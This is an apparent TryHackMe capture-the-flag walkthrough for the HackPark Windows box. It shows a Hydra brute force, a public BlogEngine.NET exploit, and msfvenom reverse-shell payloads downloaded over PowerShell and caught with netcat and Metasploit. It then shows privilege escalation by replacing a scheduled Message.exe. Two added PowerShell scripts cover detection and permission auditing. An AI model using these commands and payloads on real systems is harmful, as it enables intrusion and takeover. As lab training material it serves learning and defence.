HackPark
Bruteforce a website's login with Hydra, identify and use a public exploit, then escalate your privileges on this Windows machine!
Tags: Windows, CVE, RCE, Metasploit, winPEAS, Hydra
Used Commands
```
hydra -l <username> -P <path to wordlist> <target ip> http-post-form <payload>
searchsploit <search name>
nc -lvnp <listener port>
python3 -m http.server <webserver port>
msfvenom --list payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=<listener port> -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>
msfvenom -p <payload> -a <architecture> --encoder x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>
getuid
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:<webserver port>/<filename>' -OutFile '<output filename>'"
powershell "(New-Object System.Net.WebClient).DownloadFile('http://<webserver ip>:<webserver port>/<filename>','<output filename>')"
ren <filename> <new filename>
```
Task 1
Google: Who's the clown?
A quick search of the source code didn't give me any hints.
So I searched on Google and finally found the name.
Task 2
Find the login page in the menu. This gives us some more information about the components in use.
Hydra: Brute-forcing a password
Before I started using Hydra I did a quick search on Google and tried to find some default credentials.

| Username | Password |
|---|---|
| admin | admin |
| admin | Passw@rd123 |

Unfortunately, this didn't work out, so let's continue with Hydra.

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target ip> http-post-form <payload>
```

| Parameter | Description |
|---|---|
| -l | `<username>` |
| -P | `<wordlist>` |
| `<payload>` | everything starting from `__VIEWSTATE=...` to `...LoginButton=Log+in`; check the following screenshot |

If everything worked you should receive something like this:

```
[80][http-post-form] host: 10.10.9.86 login: admin password: 1qaxxxxx
1 of 1 target successfully completed, 1 valid password found
```
Burp Suite: Brute-forcing a password
Burp Suite's Intruder is another option for guessing passwords. The source code of the login page shows that this login seems to be for an administrator, so I decided to start with "admin" as the username and any password wordlist you can find.
You should give it a try.
Burp Suite: Request type of login form
Check out the source code of the web page, or, if you used Burp Suite, check the request when you try to log in with any credentials.
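As an added defensive counterpart to the Hydra and Intruder runs above (example code, not part of the original write-up): a PowerShell function that scans IIS W3C log lines for bursts of POSTs to the login page from one client. The login path `/Account/login.aspx`, the thresholds and the sample log lines are assumptions/constructed.

```powershell
# Added example, not from the write-up: flag password guessing against the
# BlogEngine.NET login form in IIS W3C logs (default field set; the login path is assumed).
function Find-LoginBruteForce {
    param([Parameter(Mandatory)][string[]] $Lines, [string] $LoginPath = '/Account/login.aspx',
          [int] $Threshold = 10, [int] $WindowSeconds = 60)
    # Column positions come from the #Fields header, so the field order is not hard-coded.
    $header = $Lines | Where-Object { $_ -like '#Fields:*' } | Select-Object -First 1
    $fields = ($header -replace '^#Fields:\s*', '') -split '\s+'
    $ix = @{}; for ($i = 0; $i -lt $fields.Count; $i++) { $ix[$fields[$i]] = $i }
    # Keep only POSTs to the login page (IIS writes spaces inside a field as '+').
    $attempts = foreach ($line in $Lines) {
        if ($line.StartsWith('#') -or [string]::IsNullOrWhiteSpace($line)) { continue }
        $p = $line -split ' '
        if ($p[$ix['cs-method']] -ne 'POST' -or $p[$ix['cs-uri-stem']] -ne $LoginPath) { continue }
        [pscustomobject]@{
            Time   = [datetime]::ParseExact("$($p[$ix['date']]) $($p[$ix['time']])", 'yyyy-MM-dd HH:mm:ss', $null)
            Client = $p[$ix['c-ip']]
            Status = [int]$p[$ix['sc-status']]
        }
    }
    foreach ($group in ($attempts | Group-Object Client)) {
        $times = @($group.Group.Time | Sort-Object)
        # Sliding window: the most POSTs that fall within WindowSeconds of each other.
        $peak = 0; $start = 0
        for ($end = 0; $end -lt $times.Count; $end++) {
            while (($times[$end] - $times[$start]).TotalSeconds -gt $WindowSeconds) { $start++ }
            $peak = [Math]::Max($peak, $end - $start + 1)
        }
        if ($peak -lt $Threshold) { continue }
        # WebForms answers a wrong password with 200 (form re-rendered) and a correct one
        # with a 302 redirect, so a lone 302 after a run of 200s is the attempt to chase.
        [pscustomobject]@{
            Client       = $group.Name
            PeakInWindow = $peak
            Failed       = @($group.Group | Where-Object Status -eq 200).Count
            Redirected   = @($group.Group | Where-Object Status -eq 302).Count
        }
    }
}
# Constructed sample: 12 guesses in 22 seconds from one address (the last one
# redirected) plus a single legitimate login from another address.
$sample = @('#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-bytes sc-status sc-substatus sc-win32-status time-taken')
foreach ($n in 0..11) {
    $status = if ($n -eq 11) { 302 } else { 200 }
    $sample += '2021-04-18 10:01:{0:D2} 10.10.75.91 POST /Account/login.aspx ReturnURL=/admin/ 80 - 10.10.219.52 Mozilla/5.0+(Hydra) 1400 {1} 0 0 12' -f ($n * 2), $status
}
$sample += '2021-04-18 10:05:30 10.10.75.91 POST /Account/login.aspx ReturnURL=/admin/ 80 - 10.10.1.20 Mozilla/5.0 1400 302 0 0 30'
Find-LoginBruteForce -Lines $sample | Format-Table -AutoSize
```

On a real server, feed it `Get-Content` of the files under `C:\inetpub\logs\LogFiles\W3SVC1\` instead of `$sample`; the constructed client makes 12 POSTs in one window and is reported, the legitimate login is not.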
Task 3
Check out the about page in the sidebar to find the current version of BlogEngine.
SearchSploit: Find exploits
What is the CVE Version? You will get multiple results when you search for BlogEngine.NET.

```
searchsploit BlogEngine.NET
```
![Result of search with searchsploit](https://www.xuptox.org/docs/tryhackme/hackpark/thm_hackpark_searchsploit_result.png)
Three of them concern remote code execution (that's what we are striving for), but only one of them is valid. Go and find the right one, or try them all.
Gain a reverse shell
Copy the file to your working directory.
Before we answer the next question we need to gain access to the server. Let's run that exploit; you will find everything you need to know in the file header.

```
vim 46353.cs
```

- Change the `<listener ip>` and `<listener port>`
- Set up a netcat listener on that port: `nc -lvnp <listener port>`
- Rename the exploit file to `PostView.ascx`
- Upload the file to the target server by editing a post (read the description): `http://<target ip>/admin/app/editor/editpost.cshtml`
- Use the browser to access the base URL like so: `http://<target ip>/?theme=../../App_Data/files`

`whoami` will answer the next question:
Who is the web server running as?
![Established reverse shell with running whoami: iis apppool\blog](https://www.xuptox.org/docs/tryhackme/hackpark/thm_exploit_step_4.png)
Task 4 (Metasploit)
Compromise the machine
Let’s create a better shell using msfvenom.
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=9001 -f exe > shell.exe
```
![Creation of reverse shell executable with msfvenom](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_shell_exe.png)
Set up an HTTP server on the attacker machine. I used `python3 -m http.server` for this.

```
python3 -m http.server 8000
```

Use the existing reverse shell and download `shell.exe` onto the victim machine using PowerShell.

```
powershell "(New-Object System.Net.WebClient).DownloadFile('http://<webserver ip>:8000/shell.exe','shell.exe')"
```
![python3 webserver on port 8000](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_upload_shell_exe.png)
Before executing `shell.exe`, let's start Metasploit and set up `multi/handler` with the `windows/meterpreter/reverse_tcp` payload.

```
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
```

Run `options` and set the required parameters.

```
set LHOST <atk ip>
set LPORT 9001
run
```
![Options on metasploit multi/handler with meterpreter/reverse_tcp payload](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_multi_handler.png)
Use `run` to start the listener. If everything is correct you should now see a message like this:

```
[*] Started reverse TCP handler on 10.10.219.52:9001
```

Run `shell.exe` on the victim machine:

```
shell.exe
```
![Incoming connection from target](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_multi_handler_get_session.png)
What's the OS version?
As soon as you are connected with the new Meterpreter shell, run `sysinfo` to get the OS version.
WinPEAS: Enumeration
If you do not have winPEAS stored on your machine yet, download it now. A quick search on Google will give you all the information you need.
Use the same method as in the last step to transfer `winPEAS.bat` to the target machine.
![Switch to meterpreter shell](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_upload_winPEAS_1.png)
```
powershell "(New-Object System.Net.WebClient).DownloadFile('http://<webserver ip>:8000/winPEAS.bat','winPEAS.bat')"
```
![List of files in temp folder](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_upload_winPEAS_2.png)
Run `winPEAS.bat`.
Any suspicious service running?
Have a look at the output of winPEAS (`RUNNING PROCESSES` is what we are searching for):
```
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] RUNNING PROCESSES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Something unexpected is running? Check for vulnerabilities
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes

Image Name                PID      Services
========================= ======== ============================================
System Idle Process       0        N/A
System                    4        N/A
smss.exe                  376      N/A
csrss.exe                 524      N/A
csrss.exe                 580      N/A
wininit.exe               588      N/A
winlogon.exe              616      N/A
services.exe              680      N/A
lsass.exe                 688      SamSs
svchost.exe               748      BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe               792      RpcEptMapper, RpcSs
dwm.exe                   872      N/A
svchost.exe               888      Dhcp, EventLog, lmhosts, Wcmsvc
svchost.exe               916      AeLookupSvc, CertPropSvc, DsmSvc, gpsvc,
                                   iphlpsvc, LanmanServer, ProfSvc, Schedule,
                                   SENS, SessionEnv, ShellHWDetection, Themes,
                                   Winmgmt
svchost.exe               972      EventSystem, FontCache, netprofm, nsi,
                                   W32Time, WinHttpAutoProxySvc
svchost.exe               360      CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe               848      BFE, DPS, MpsSvc
spoolsv.exe               1148     Spooler
amazon-ssm-agent.exe      1180     AmazonSSMAgent
svchost.exe               1256     AppHostSvc
LiteAgent.exe             1276     AWSLiteAgent
svchost.exe               1372     TrkWks, UALSVC, UmRdpService
svchost.exe               1388     W3SVC, WAS
WService.exe              1416     WindowsScheduler
WScheduler.exe            1556     N/A
Ec2Config.exe             1656     Ec2Config
WmiPrvSE.exe              1748     N/A
svchost.exe               1432     TermService
taskhostex.exe            2584     N/A
explorer.exe              2656     N/A
ServerManager.exe         2360     N/A
WScheduler.exe            1804     N/A
msdtc.exe                 1888     MSDTC
w3wp.exe                  2520     N/A
cmd.exe                   1564     N/A
conhost.exe               2116     N/A
shell.exe                 1860     N/A
cmd.exe                   2132     N/A
conhost.exe               924      N/A
WmiPrvSE.exe              1864     N/A
TrustedInstaller.exe      1948     TrustedInstaller
TiWorker.exe              1356     N/A
tasklist.exe              2668     N/A
```
Head over to the `SystemScheduler` folder.

```
cd "c:\Program Files (x86)\SystemScheduler"
```
Check out the read, write, execute permissions! That looks great!
```
meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   4096     dir   2019-08-04 11:36:53 +0000  Events
100666/rw-rw-rw-  60       fil   2019-08-04 11:36:42 +0000  Forum.url
100666/rw-rw-rw-  9813     fil   2019-08-04 11:36:42 +0000  License.txt
100666/rw-rw-rw-  1496     fil   2019-08-04 11:37:02 +0000  LogFile.txt
100666/rw-rw-rw-  3760     fil   2019-08-04 11:36:53 +0000  LogfileAdvanced.txt
100777/rwxrwxrwx  536992   fil   2019-08-04 11:36:42 +0000  Message.exe
100777/rwxrwxrwx  445344   fil   2019-08-04 11:36:42 +0000  PlaySound.exe
100777/rwxrwxrwx  27040    fil   2019-08-04 11:36:42 +0000  PlayWAV.exe
100666/rw-rw-rw-  149      fil   2019-08-04 11:36:53 +0000  Preferences.ini
100777/rwxrwxrwx  485792   fil   2019-08-04 11:36:42 +0000  Privilege.exe
100666/rw-rw-rw-  10100    fil   2019-08-04 11:36:42 +0000  ReadMe.txt
100777/rwxrwxrwx  112544   fil   2019-08-04 11:36:42 +0000  RunNow.exe
100777/rwxrwxrwx  235936   fil   2019-08-04 11:36:42 +0000  SSAdmin.exe
100777/rwxrwxrwx  731552   fil   2019-08-04 11:36:42 +0000  SSCmd.exe
100777/rwxrwxrwx  456608   fil   2019-08-04 11:36:42 +0000  SSMail.exe
100777/rwxrwxrwx  1633696  fil   2019-08-04 11:36:42 +0000  Scheduler.exe
100777/rwxrwxrwx  491936   fil   2019-08-04 11:36:42 +0000  SendKeysHelper.exe
100777/rwxrwxrwx  437664   fil   2019-08-04 11:36:42 +0000  ShowXY.exe
100777/rwxrwxrwx  439712   fil   2019-08-04 11:36:42 +0000  ShutdownGUI.exe
100666/rw-rw-rw-  785042   fil   2019-08-04 11:36:42 +0000  WSCHEDULER.CHM
100666/rw-rw-rw-  703081   fil   2019-08-04 11:36:42 +0000  WSCHEDULER.HLP
100777/rwxrwxrwx  136096   fil   2019-08-04 11:36:42 +0000  WSCtrl.exe
100777/rwxrwxrwx  68512    fil   2019-08-04 11:36:42 +0000  WSLogon.exe
100666/rw-rw-rw-  33184    fil   2019-08-04 11:36:42 +0000  WSProc.dll
100666/rw-rw-rw-  2026     fil   2019-08-04 11:36:42 +0000  WScheduler.cnt
100777/rwxrwxrwx  331168   fil   2019-08-04 11:36:42 +0000  WScheduler.exe
100777/rwxrwxrwx  98720    fil   2019-08-04 11:36:42 +0000  WService.exe
100666/rw-rw-rw-  54       fil   2019-08-04 11:36:42 +0000  Website.url
100777/rwxrwxrwx  76704    fil   2019-08-04 11:36:42 +0000  WhoAmI.exe
100666/rw-rw-rw-  1150     fil   2019-08-04 11:36:42 +0000  alarmclock.ico
100666/rw-rw-rw-  766      fil   2019-08-04 11:36:42 +0000  clock.ico
100666/rw-rw-rw-  80856    fil   2019-08-04 11:36:42 +0000  ding.wav
100666/rw-rw-rw-  1637972  fil   2019-08-04 11:36:42 +0000  libeay32.dll
100777/rwxrwxrwx  40352    fil   2019-08-04 11:36:42 +0000  sc32.exe
100666/rw-rw-rw-  766      fil   2019-08-04 11:36:42 +0000  schedule.ico
100666/rw-rw-rw-  355446   fil   2019-08-04 11:36:42 +0000  ssleay32.dll
100666/rw-rw-rw-  6999     fil   2019-08-04 11:36:42 +0000  unins000.dat
100777/rwxrwxrwx  722597   fil   2019-08-04 11:36:42 +0000  unins000.exe
100666/rw-rw-rw-  6574     fil   2019-08-04 11:36:42 +0000  whiteclock.ico
```
Let's dig deeper into the `Events` folder and check some log files.

```
meterpreter > cd Events
meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler\Events
======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1926   fil   2019-08-04 22:05:19 +0000  20198415519.INI
100666/rw-rw-rw-  27140  fil   2019-08-04 22:06:01 +0000  20198415519.INI_LOG.txt
100666/rw-rw-rw-  290    fil   2020-10-02 21:50:12 +0000  2020102145012.INI
100666/rw-rw-rw-  186    fil   2021-04-18 10:02:05 +0000  Administrator.flg
100666/rw-rw-rw-  182    fil   2021-04-18 10:01:36 +0000  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2021-04-18 10:02:05 +0000  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 11:36:53 +0000  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2021-04-18 10:01:36 +0000  service.flg
```
While you check the log files you will find this:

```
meterpreter > cat 20198415519.INI_LOG.txt
...
04/18/21 04:13:34,Process Ended. PID:2376,ExitCode:4,Message.exe (Administrator)
04/18/21 04:14:01,Event Started Ok, (Administrator)
04/18/21 04:14:34,Process Ended. PID:2880,ExitCode:4,Message.exe (Administrator)
04/18/21 04:15:01,Event Started Ok, (Administrator)
04/18/21 04:15:33,Process Ended. PID:2604,ExitCode:4,Message.exe (Administrator)
04/18/21 04:16:01,Event Started Ok, (Administrator)
04/18/21 04:16:33,Process Ended. PID:2556,ExitCode:4,Message.exe (Administrator)
04/18/21 04:17:00,Event Started Ok, (Administrator)
04/18/21 04:17:34,Process Ended. PID:2400,ExitCode:4,Message.exe (Administrator)
04/18/21 04:18:01,Event Started Ok, (Administrator)
04/18/21 04:18:34,Process Ended. PID:2956,ExitCode:4,Message.exe (Administrator)
04/18/21 04:19:01,Event Started Ok, (Administrator)
meterpreter >
```
There is a scheduled job running every 30 seconds. Check which user it runs as. Great! Let's get root now.
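As an added defensive counterpart to the enumeration above (example code, not the author's), this PowerShell audits the folder found with winPEAS for binaries that low-privileged principals can replace and lists the services whose executable lives under it, which is exactly the condition the scheduled `Message.exe` job exposes. The path defaults to the SystemScheduler folder from the listing; the principal list and the file types are assumptions to adapt.

```powershell
# Added example, not from the write-up: find program binaries that low-privileged
# principals can overwrite and show which services would execute them, and as whom.
function Find-WritableExecutables {
    param(
        [string] $Path = 'C:\Program Files (x86)\SystemScheduler',
        # Assumed list of principals that must never hold write rights on program binaries.
        [string[]] $LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    )
    # Rights that let a user swap the file out; Modify and FullControl contain these bits.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $genericWrite = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL seen on inherited ACEs
    Get-ChildItem -LiteralPath $Path -Recurse -File -Include *.exe, *.dll, *.bat, *.ps1 -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            foreach ($ace in (Get-Acl -LiteralPath $file.FullName).Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                $rights = [int]$ace.FileSystemRights
                if (($rights -band $writeMask) -eq 0 -and ($rights -band $genericWrite) -eq 0) { continue }
                [pscustomobject]@{
                    File      = $file.FullName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
}

# Which services would actually run a replaced binary from that folder, and under which account?
function Get-ServicesUnderPath {
    param([string] $Path = 'C:\Program Files (x86)\SystemScheduler')
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -and $_.PathName.TrimStart('"').StartsWith($Path, 'OrdinalIgnoreCase') } |
        Select-Object Name, State, StartName, PathName
}

Find-WritableExecutables | Format-Table -AutoSize
Get-ServicesUnderPath    | Format-Table -AutoSize
```

On this box the first function reports every `.exe` in the folder as writable by low-privileged users, and the second shows the `WindowsScheduler` service (`WService.exe`) and its account; the fix is to strip write rights for those principals from the directory so its binaries inherit a sane ACL.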
Root the machine
Replace `Message.exe` with our renamed `shell.exe`. Use the Python web server set up earlier to download the shell into the SystemScheduler folder.

```
meterpreter > shell
Process 2628 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\Program Files (x86)\SystemScheduler>powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'c:\Program Files (x86)\SystemScheduler\shell.exe'"
```
In Metasploit:

- Background the current channel:

```
c:\Program Files (x86)\SystemScheduler>^Z
Background channel 8? [y/N] y
meterpreter > pwd
c:\Program Files (x86)\SystemScheduler
```

- Rename `Message.exe` to `Message.exe.bak`:

```
meterpreter > mv Message.exe Message.exe.bak
```

- Rename `shell.exe` to `Message.exe`:

```
meterpreter > mv shell.exe Message.exe
```

- Background the current session with `ctrl + z` and run the previous `multi/handler` again:

```
meterpreter >
Background session 1? [y/N] y
[-] Unknown command: y.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.219.52:9001
```
Within 30 seconds WindowsScheduler will run `Message.exe`, which we replaced with our venomous `shell.exe`. As the task is executed as Administrator, a reverse shell with the corresponding permissions will be established.
```
[*] Sending stage (176195 bytes) to 10.10.75.91
[*] Meterpreter session 2 opened (10.10.219.52:9001 -> 10.10.75.91:49304) at 2021-04-18 11:30:01 +0000
meterpreter > getuid
Server username: HACKPARK\Administrator
```
Congrats! You have root.
Task 5 (w/o Metasploit)
Use the same exploit to gain an initial reverse shell. Set up a netcat listener with `nc -lvnp 4445`.

```
root@kali:~/Desktop/HackPark# nc -lvnp 4445
listening on [any] 4445 ...
```

Use the browser to establish the initial reverse shell: `http://<target ip>/admin/app/editor/editpost.cshtml`

```
listening on [any] 4445 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.75.91] 49313
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
```
Compromise the machine
The goal is to get root using `windows/shell_reverse_tcp` (instead of the Meterpreter payload used in Task 4).
Create a venomous `shell.exe` with this payload. Note that the encoder is named `x86/shikata_ga_nai`; with the leading slash used here msfvenom cannot find it and falls back to the raw, unencoded payload, which is what the output below reports.

```
root@kali:~/Desktop/HackPark# msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=10.10.219.52 LPORT=9001 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] Skipping invalid encoder /x86/shikata_ga_nai
[!] Couldn't find encoder to use
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
```
Move the file to the target. A simple `http.server` will do. On your attacker machine:

```
root@kali:~/Desktop/HackPark# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
Root the machine
Switch to the victim's machine and change the current directory to `c:\Program Files (x86)\SystemScheduler`.

```
cd "c:\Program Files (x86)\SystemScheduler"
```

Download the generated `shell.exe` and `winPEAS.bat` onto the victim machine.

```
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'shell.exe'"
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/winPEAS.bat' -OutFile 'winPEAS.bat'"
```

Start a netcat listener on your machine. For better stability, I wrapped it in `rlwrap`.

```
root@kali:~/Desktop/HackPark# rlwrap nc -lvnp 9001
listening on [any] 9001 ...
```
Rename `Message.exe`:

```
c:\Program Files (x86)\SystemScheduler>ren "Message.exe" "Message.exe.bak"
```

Finally, rename the uploaded `shell.exe` on the target machine to `Message.exe`:

```
c:\Program Files (x86)\SystemScheduler>ren "shell.exe" "Message.exe"
```

Wait for WindowsScheduler to run our new `Message.exe`:

```
root@kali:~# rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.181.219] 49214
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\PROGRA~2\SYSTEM~1>echo %username%
echo %username%
Administrator
```

Congrats! You have root.